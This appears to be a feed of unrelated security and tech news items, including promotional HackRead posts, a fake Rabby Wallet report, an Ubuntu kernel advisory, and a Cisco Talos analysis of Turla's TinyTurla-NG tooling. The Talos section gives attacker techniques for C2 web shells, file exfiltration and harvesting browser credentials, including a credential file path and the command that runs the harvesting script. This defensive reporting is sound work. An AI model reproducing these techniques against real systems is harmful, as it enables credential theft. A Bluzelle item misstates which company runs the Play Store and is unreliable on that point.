By Uzair Amir
Meet Curium by Bluzelle, a new Miner Pool app.
This is a post from HackRead.com Read the original post: Bluzelle’s Curium App Makes Crypto Earning Effortless

Bluzelle, a Singapore-based decentralized storage company, is making it easier than ever to earn cryptocurrency with the launch of Curium, a new Miner Pool app. Curium allows anyone to contribute storage space and security to Bluzelle’s network and earn BLZ tokens in return, all from their computer or mobile device.

Traditionally, running nodes for blockchain projects has been a complex process requiring technical expertise and expensive hardware. Curium eliminates these barriers by offering a user-friendly app that works on any device, regardless of operating system.

The good news is that Bluzelle solves this by making it easy for anyone to install the Curium app on their computers or mobile devices. This app works on any operating system, including Windows, Mac, Linux, Android, or iOS. Once installed, users simply need to provide their Bluzelle wallet address.

Their device then becomes a “just in time” (JIT) storage node service provider, earning BLZ tokens for the fractional times their machine is online. This operation is similar to an Ethereum PoS pooler miner app, where anyone can install the app on their PC and start earning fractional amounts of ETH based on their device’s uptime.

However, it’s worth mentioning that users must remain alert against fake crypto apps created by scammers targeting iOS, Android, and Windows devices. Recently, Apple approved a fake wallet app on the Play Store that stole user data.

Similarly, Microsoft permitted a fake fundraising app that siphoned almost a million dollars from users. Furthermore, Google has been involved in multiple incidents where fake apps led to the theft of users’ funds. Therefore, it is significant to note that the Curium app is expected to be released by the end of 2024.

“The Curium storage node application is one of the core technologies we envisioned when we launched Bluzelle’s white paper over six years ago,” said Neeraj Murarka, co-founder and CTO of Bluzelle. “Now anyone can become part of our decentralized infrastructure network and earn rewards for simply having their device online.”

With Curium, users can contribute to the security and storage of Bluzelle’s network while earning BLZ tokens. This opens up the world of cryptocurrency to a wider audience, making it easier for anyone to participate in the Web3 revolution.

1.  **Navigating the new frontier of cryptocurrency futures**
2.  **What the Bitcoin ETF Approval Mean for the Crypto Market** 
3.  **Powerloom to Hold First Ever Node Mint on Polygon Network**
4.  **Exploring the Phenomenal Rise of Ethereum as a Digital Asset**
5.  **The Anatomy of Trading Bot Scams: Strategies for Secure Investments**

Bluzelle’s Curium App Makes Crypto Earning Effortless

Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.

*   Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.

*   One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.

*   Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.

**C2 server analysis**

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $\_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell\_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.

C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

*   "**task**": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/\_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.

*   "**gettask**": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.

*   "**result**": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.

*   "**getresult**": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.

*   "**file**" + "**name**": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.

*   "**cat\_file**": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.

*   "**rm\_file**": Remove/delete a file specified by the requestor from the C2 server.

The C2 script’s request handling logic.

The HTTP form values accepted by the C2 server “task”, “cat\_file”, “rm\_file”, “get\_result” and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, _from a remote location_, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

**Instrumenting TinyTurla-NG to carry out post-compromise activity**

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

*   **Reconnaissance commands:** Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

*   **Copy file commands:** Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\\windows\\temp\\

PowerShell script copies files to an intermediate location.  

*   **Exfiltration** **commands/scripts aka TurlaPower-NG:** These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:

*   Chisel: Modified copy of the Chisel client/agent.

*   Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.

*   Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

**Using Chisel as another means of persistent access**

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\\Windows\\System32\\TrustedWorker\[.\]exe

The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

*   **“R”:** Stands for remote port forwarding.
*   **“5000”**: This is the port on the attacker machine that receives the connection from the infected system.
*   **“socks”**: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127\[.\]0\[.\]0\[.\]1:1080)

The C2 server that the chisel sample contacts is: 91\[.\]193\[.\]18\[.\]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named as “dropher\[.\]com” and the subject name is “blum\[.\]com”.

TLS Certificate for the chisel malware used by Turla. 

During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or they intended for the certificate to be used on another modified chisel implant. 

Certificate issuer DN.

The new certificate has the same issuer but in this case, the common name is _blum\[.\]com_ and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd\[.\]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.

The tool contains the embedded cmd\[.\]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:

C:\\windows\\system32\\edgeparser.ps1

This script is used to find  login data from Microsoft Edge located at:

%userprofile%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data

This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\\windows\\temp\\<filename>.zip

The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:

%userprofile%\\AppData\\Local\\Microsoft\\Edge

PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\\Windows\\System32\\i.exe" \_PID\_ "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\\Windows\\System32\\cmd.exe /c "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40  
ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc  
13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346  
b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

TinyTurla-NG in-depth tooling and command and control analysis

By Waqas
Crypto Nightmare! Fake Rabby Wallet App Steals Millions After Apple App Store Fails to Catch It.
This is a post from HackRead.com Read the original post: Apple Approves Fake App Before Real Rabby Wallet, Users’ Funds Stolen

Users report significant losses due to the fake Rabby Wallet app, including one reporting a $5000 loss, another experiencing a 10% portfolio loss, and an NFT collector reporting $40,000 worth of ETH drained from their wallet. 

A fake version of the Rabby Wallet app, a popular crypto wallet developed by DeBank Global Pte Ltd., was tricking users and stealing their funds on the Apple App Store. DeBank’s team confirmed that any app available on the store currently is fake, as its official app is still under review and yet to be approved by Apple.

For your information, Rabby Wallet’s mobile app’s beta version was announced on 16 February by team DeBank. However, scammers acted quickly and uploaded the app’s fake version to the iOS App Store, which was a wallet drainer and had no connection with the real app.

Interestingly, this fake version was approved by Apple before the actual wallet app, prompting users to download the drainer and get scammed.

The fake Rabby Wallet app, created by a developer called “Solution Development,” appeared on the App Store under the name “Rabby Wallet & Crypto Solution” and was detected after four days. A thread warning others about the fake app was posted on Rabby Wallet’s **Apple discussion board** and **Discord** channel with screenshots from scammed users.

The fake Rabby App on the Apple App Store

Affected users have also created a thread on Reddit to warn others about the fake app. One user claimed that a fake app by “VIET LONG FINANCIAL INVESTMENT JOINT STOCK COMPANY” has been approved, causing users to lose cryptocurrencies, with a user losing around 14 ETH.

“This scammer’s approved AppStore App called “Rabby Wallet & Crypto Solution” is tricking people into thinking it is the genuine one, they enter the seed phrase or private key, and moments later all of their life savings, crypto belongings are GONE!” a user u/CryptoCurrency **wrote** on Reddit.

Rabby Wallet team **posted** a statement on X to notify users about the presence of a fake app and to avoid downloading it. The fake app has now been removed by Apple.

However, this isn’t the first instance where fake apps appeared on a credible platform like the Apple App Store and deceived users. On February 7, 2024, Hackread.com **published a warning from LastPass**, urging users to avoid downloading fraudulent applications and remain cautious after a fake app was uploaded to the Apple App Store, posing as the legitimate LastPass Password Manager app. The app was developed by Parvati Patel and closely resembled LastPass’ branding and user interface.

In July 2023, **Apple approved a fake THREADS app**, which subsequently ranked first on the European Apple Store, despite the original app being launched by META just days before and wasn’t available in Europe. Nevertheless, such incidents are steadily rising, making Apple’s app review and approval process doubtful and questionable.

****RELATED ARTICLES****

1.  **Google Deletes Fake BatteryBot Pro Malware App**
2.  **MMRat Android Trojan Uses Fake App Stores for Bank Fraud**
3.  **Fake Ledger App on Microsoft Store Stole $800,000 in Crypto**
4.  **Chinese Scammers Use Fake Loan Apps for Money Laundering**
5.  **Hackers Send Fake Rocket Alerts to Israelis via Hacked Red Alert App**

Apple Approves Fake App Before Real Rabby Wallet, Users’ Funds Stolen

By Uzair Amir
Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own…
This is a post from HackRead.com Read the original post: Types of SaaS Applications: Categories and Examples

Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own successful Software as a Service product!

Today, almost any company, from small startups to large enterprises, uses SaaS solutions in its day-to-day operations. With various types of SaaS products becoming essential for business operations, more and more companies are considering building SaaS applications.

If you want to know how to build a SaaS app, learning about the types and categories of these solutions is critical. With this knowledge, you can create a more comprehensive blueprint for your future product and have a deeper understanding of the modern SaaS market.

****About SaaS solutions****

Software as a Service (SaaS) is a software distribution model that allows users to access applications via the Internet on a subscription basis. SaaS is a subset of cloud computing due to the absolute majority of software-as-a-service apps being cloud-based.

Unlike traditional desktop apps, you don’t need to download and install SaaS solutions. Cloud computing allows users to enjoy all of the features and functionalities using remote servers.

The SaaS model began to gain traction in the late 1990s due to the success of web-based CRM systems, such as Salesforce. With the emergence of affordable cloud providers, many companies started to build SaaS products. Let’s talk about the main advantages of the SaaS model:

*   **Cost-effectiveness.** Companies and individuals can usually choose the one that fits them best from several subscription plans. Almost any SaaS offering will still be cheaper than buying traditional software, plus there is no need to spend money on hardware and infrastructure, the responsibility for maintenance, upgrades, and scalability lies with cloud service providers.
*   **Accessibility.** Cloud-based SaaS applications can be accessed from any device with an internet connection and web browser. With just a web browser, users can interact with Software as a Service product without the need to install or update anything manually.
*   **Scalability.** Scalability is often an issue for web applications and websites with traditional, client-server architecture. But you don’t need to worry about how to build a SaaS website or app that can provide scalability without sacrificing performance. Cloud services allow businesses to scale their product back and forth without significant investments or operational downtime.
*   **Security.** Protecting sensitive data is one of the main tasks in the modern software development industry. Reliable cloud providers offer a high level of security due to their decentralized nature. With information being stored in several places at once, it is more difficult for malicious actors to access it.

****SaaS categories****

When experts in SaaS application development describe different types of SaaS solutions, we can often hear two terms: _horizontal_ and _vertical_. An experienced SaaS development company can consult you on which type of app you need, but it is still essential to have a basic understanding of these classifications yourself. Let’s talk about these two categories:

*   **Horizontal SaaS.** If you wonder how to develop a SaaS application that will meet the needs of businesses across multiple industries, horizontal solutions are for you. These products offer features and services that can be applied to various business settings. Horizontal SaaS platforms are often used for improving day-to-day operations, streamlining processes, and increasing productivity.
*   **Vertical SaaS.** If you, on the other hand, want to develop a SaaS application that is designed to meet the needs of a specific industry or organization type, this option is perfect for you. Vertical Software as a Service product is used in healthcare, retail, fintech, and governmental projects. You need specific SaaS development expertise in your team to create vertical apps.

****Types of SaaS Applications****

Vertical and horizontal are the key types of Software as a Service solution, but to know how to build SaaS applications with impressive functionalities and competitive advantage, you need to learn about the most widely used categories of SaaS.

****CRM software****

This is one of the most popular types of B2B SaaS software that almost any company has experience with. Customer Relationship Management (CRM) system is an essential part of any business workflow and enables companies to keep track of customer data and gain valuable insights about clients’ preferences and behaviour.

Most of the modern CRM solutions offer task automation, advanced analytics, and even predictive analysis based on customer data. The most well-known CRM software today are Salesforce, Hubspot, Zoho, and Microsoft Dynamics 365.

If you want to learn more about developing SaaS applications like these, take a closer look at their core features and implementation of cutting-edge technologies like AI and ML, and consult with a SaaS application development company that has successful cases of building CRM SaaS products.

****CMS software****

Content Management Systems (CMS) enable individuals with no experience in the software development process to create and manage web pages and digital content. Unlike the majority of SaaS types on our list, CMS is not designed specifically for business use, but companies still can benefit from them, creating basic websites without a development team.

Today, there are four top CMS SaaS products: WordPress, Drupal, Shopify, and Joomla. Each solution has its long list of pros and cons, struggling in certain aspects and excelling in others.

To build a SaaS app that will be as good if not better than these five, you need to not only have a good understanding of the SaaS model and have a reliable SaaS app development partner but also to become familiar with the most widely used CMS SaaS products and their features and functionalities.

****ERP software****

Enterprise Resource Planning (ERP) software is used by companies of any size for managing business processes. These SaaS applications offer such features as inventory and order management, operations scheduling, customer relationships management, and handling of accounting tasks. Many ERP solutions try to integrate CRM, project management, accounting, and HR modules, making them the types of SaaS software that companies need for managing day-to-day operations.

The most prominent players in the ERP industry are SAP, Oracle, NetSuite, and Microsoft Dynamics 365. As you can see, Microsoft Dynamics appears in our list in the second category already due to its different functionalities and features that can be used in various processes. It can serve as a lesson for anyone interested in how to create a SaaS application that is always in demand.

****Project management software****

Project management tools are widely used today for planning, executing, and monitoring projects. They help to improve efficiency by creating workflows, enabling teams to keep track of different tasks, and reducing the chance of miscommunications and errors. Modern project management software also leverages AI capabilities for repetitive task automation, data visualization, and report generation.

The most successful SaaS project management tools today are Trello, Asana, Jira, Microsoft Project, and Notion. These solutions offer essential features and capabilities needed for efficient project management, but each one has its own unique additions and distinct user interface. By researching these tools, you can learn how to create SaaS applications that can be used for project management tasks by companies from different industries.

****HR software****

Human Resources (HR) software enables organizations to seamlessly manage employee data and create a streamlined HR process from recruitment to retirement. It allows companies to save time, administrative resources, and money. No wonder that more and more SaaS development companies have decided to develop SaaS applications for HR purposes.

The most widely used and acclaimed HR software products are SAP, ADP, Workday, Zoho People, and BambooHR. These tools not only provide features and capabilities for managing all of an organization’s HR operations but also work seamlessly with third-party integrations and offer robust analytics. Of all the types of SaaS products, this is one of the most promising ones, considering that businesses of any size and industry have employees and HR tasks that need solving from time to time.

****Accounting and billing software****

Every company needs tools for processing payments and managing finances. Accounting and billing SaaS solutions offer an efficient and cost-effective way to control finances and streamline operations. The most widely used accounting Software as a Service platforms are Xero, QuickBooks Online, and Freshbooks. All of these solutions offer such benefits as easier compliance with regulations, real-time data insights, and improved collaboration between departments.

As for billing software, it is crucial to find reliable solutions with perfect reputations. Among the most well-known and established payment gateways you can integrate within your platform during SaaS platform development are PayPal and Stripe. By researching and comparing accounting and billing software, you can gain valuable insights into building a SaaS product for efficient financial management.

****Communication software****

During the global pandemic, communication software grew in popularity beyond the boldest projections, and today, more and more companies dream of building a SaaS platform that will be used for remote work and corporate communication.

The most popular SaaS communication software today is Slack, Google Meets, Zoom, Skype, and Microsoft Teams. Most of these tools are free, with some additional features available for an extra price. Modern communication tools provide such capabilities as file sharing, screen sharing, chat recording, and remote control. With remote work becoming more and more popular, developing SaaS applications for communication and collaborations seems like a safe bet and an excellent investment.

****Conclusion****

With numerous types of SaaS services available today, it can be easy to get confused, but a deep understanding of these basics is the first step to becoming a real expert in SaaS software development. Of course, you can just hire a SaaS application development services provider; however, without your input at the planning stage and a clear vision for the final product, chances for success are much lower.

After choosing the type of Software as a Service product you want to develop, you and your development team can choose the right tech stack, avoid many SaaS application development challenges, and build the SaaS application of your dreams.

****RELATED ARTICLES****

1.  **20 Best Amazon PPC Management Agencies**
2.  **SaaS Security Best Practices: Safeguard Consumer Data**
3.  **15 Best SaaS SEO Experts That Will Help You Dominate Online**
4.  **How To Reduce Cost Overruns For AI Implementation Projects**
5.  **The Role of DevOps in Streamlining Cloud Migration Processes**

Types of SaaS Applications: Categories and Examples

By Uzair Amir
Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not…
This is a post from HackRead.com Read the original post: Top Software Development Outsourcing Trends

Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not only by its combination of cost-effectiveness and 1.3 million unparalleled talent but also by the attention it’s receiving from major companies.

Tech giants such as Google, Apple, Microsoft, and successful startups like Spotify and Slack have recognized the potential and established developer teams in the region. And what is the key to the successful establishment of a software development team in Eastern Europe?

At Alcor, we specialize in IT recruitment in EE and Latin America, concentrating primarily on middle, senior, and C-level positions. We cater to IT product companies eager to hire talent from countries like Poland, Romania, and other parts of Eastern Europe. Our commitment to bridging talent needs has positioned us as a go-to for organizations keen on leveraging the region’s tech expertise.

For a more comprehensive insight into IT outsourcing to Eastern Europe, read this article that provides a deeper dive into the region’s growing significance.

****Eastern Europe: The Undisputed IT Outsourcing Hub****

Projected global IT spending is set to reach an astonishing $4.5 trillion by 2023, as per Gartner’s recent forecast. This elevates the importance for businesses to derive maximum value from every penny spent. Validating this trend, 60% of technology companies are turning towards outsourcing partners for a certain portion of their software development needs.

While India and China have been historical leaders in IT outsourcing, there’s a notable drift towards Eastern Europe. This is driven by various factors, chief among them being the pressing concerns over Intellectual Property Rights in countries like China, accompanied by communication barriers and significant time differences. According to a comprehensive study, the Eastern European IT industry is set to grow annually by 7.84%, reaching an impressive $15.70bn by 2027. 

Several factors contribute to this shift:

*   Quality Over Quantity: Eastern Europe is gaining traction due to its emphasis on quality, ensuring that projects aren’t just completed but stand out in a competitive global market.
*   Cultural and Temporal Proximity: Eastern Europe’s closeness to Western European and North American markets means fewer time zone issues and cultural barriers. This streamlines communication and ensures smoother project executions.
*   Educated Workforce: Having over 300 higher education institutions that provide STEM programs (most of which are among the QS World University Rankings 2023), the region has plenty of highly qualified software developers.

But, what are the most significant software development trends in EE?

****A Flourishing IT Landscape in Eastern Europe****

Eastern Europe, encompassing nations such as Poland, Romania, Ukraine, Czech Republic, Hungary, Slovakia, Bulgaria, and Estonia, is swiftly emerging as a heavyweight in the international IT arena. The region’s allure is grounded in a blend of advantageous tax regimes, burgeoning IT advancements, and a vast reservoir of adept professionals. Initiatives from governments, like backing for startups and the proliferation of tech parks and innovation centers, amplify this attraction, spotlighting Eastern Europe as a potential IT powerhouse.

However, it’s the region’s multifaceted technical prowess that truly differentiates it. Poland, for example, is distinguished for its expertise in languages like JavaScript, Java, Python, and TypeScript. Romania excels with skills in PHP, C#, Java, and C++. The Czech Republic showcases deep knowledge in areas such as JavaScript, Java, PHP, and C#. Neighbouring countries like Hungary and Slovakia further enrich the tech tapestry, with commendable skills in areas spanning JavaScript, HTML/CSS, Python, Java, and PHP.

****Understanding the Tax Landscape: Poland, Romania, Bulgaria, and Ukraine****

Bulgaria stands out with its straightforward tax system. Both corporate and personal income taxes are set at a uniform rate of 10%. This simplicity is attractive to many businesses and professionals looking for clarity in fiscal matters.

Poland presents a more nuanced tax structure. CIT is typically 19%, but a reduced rate of 9% is available for smaller entities, barring certain exceptions. Individuals, on the other hand, pay 12% for income up to PLN 120,000. Beyond this threshold, they’re taxed at 32%. Additionally, high earners with an income surpassing PLN 1 million face a solidarity surcharge of 4%.

In Romania, companies face a corporate tax of 16%, while individuals are charged a 10% personal income tax. Ukraine, meanwhile, sets its corporate tax at 18%. The personal income tax is relatively low, standing at 5% for the majority, though there are specific exceptions to this rate.

****Prioritizing Cybersecurity in Outsourcing****

In an age where data breaches and cyber threats loom large, outsourcing shouldn’t be just about getting the job done but also about ensuring it’s done securely. However, IT outsourcing does not always let businesses reach complete security. There are cases when clients risk or even lose their intellectual property rights if they don’t sign an IT rights transfer agreement with their IT outsourcing firm. If they cooperate with IT recruitment or R&D providers, though, this never happens. Meanwhile, Eastern Europe, with its strong emphasis on IT education and rigorous data protection laws (GDPR), ensures that businesses aren’t just given quality work but also the peace of mind that their data remains secure.

****The Talent Over Cost Paradigm****

Although affordability is a compelling consideration, the genuine essence of value is in work quality. In the corporate realm, there’s an escalating recognition that, while trimming expenses is advantageous, skimping on talent could have long-term repercussions. This mindset is evident in Eastern Europe’s recruitment strategies, emphasizing the skills and versatility of professionals over mere hourly compensation.

Moreover, IT recruitment & R&D services companies like Alcor are setting the gold standard in IT recruitment services. Prioritizing talent ensures a symbiotic relationship where businesses get top-tier solutions, and developers get a conducive environment that nurtures their skills.

Such vendors offer IT businesses access to pre-vetted talents with their guarantee of quick and efficient hiring. Plus, software developers hired via such agencies go through a pre-screening interview stage, which boosts the overall quality of candidates. Such practices ensure businesses stay ahead of technological advances and market demands.

****Navigating the IT Talent Retention Challenge****

The global IT landscape isn’t just grappling with the complexities of outsourcing; it’s contending with a deeper issue of employee retention. As highlighted by a recent Gartner survey, a mere 29% of IT professionals express a solid intention to stick with their current roles. In the outsourcing model, frequent project shifts can sometimes make developers feel detached, leading to a decreased perception of value in their work. This transience often prompts them to seek new job opportunities.

Conversely, product-based companies tend to have a different dynamic. Here, developers aren’t just part of the solution-making process but are integral to business growth. Their roles and contributions directly influence their career trajectories and earnings. This sense of purpose and alignment with the company’s growth often translates to higher job satisfaction and longer tenure.

Top Software Development Outsourcing Trends

Ubuntu Security Notice 6647-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6647-1February 21, 2024linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)It was discovered that the netfilter connection tracker for netlink in theLinux kernel did not properly perform reference counting in some errorconditions. A local attacker could possibly use this to cause a denial ofservice (memory exhaustion). (CVE-2023-7192)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):   linux-image-4.15.0-1128-oracle  4.15.0-1128.139   linux-image-4.15.0-1149-kvm     4.15.0-1149.154   linux-image-4.15.0-1159-gcp     4.15.0-1159.176   linux-image-4.15.0-1165-aws     4.15.0-1165.178   linux-image-4.15.0-1174-azure   4.15.0-1174.189   linux-image-4.15.0-222-generic  4.15.0-222.233   linux-image-4.15.0-222-lowlatency  4.15.0-222.233   linux-image-aws-lts-18.04       4.15.0.1165.163   linux-image-azure-lts-18.04     4.15.0.1174.142   linux-image-gcp-lts-18.04       4.15.0.1159.173   linux-image-generic             4.15.0.222.206   linux-image-kvm                 4.15.0.1149.140   linux-image-lowlatency          4.15.0.222.206   linux-image-oracle-lts-18.04    4.15.0.1128.133   linux-image-virtual             4.15.0.222.206Ubuntu 16.04 LTS (Available with Ubuntu Pro):   linux-image-4.15.0-1128-oracle  4.15.0-1128.139~16.04.1   linux-image-4.15.0-1159-gcp     4.15.0-1159.176~16.04.1   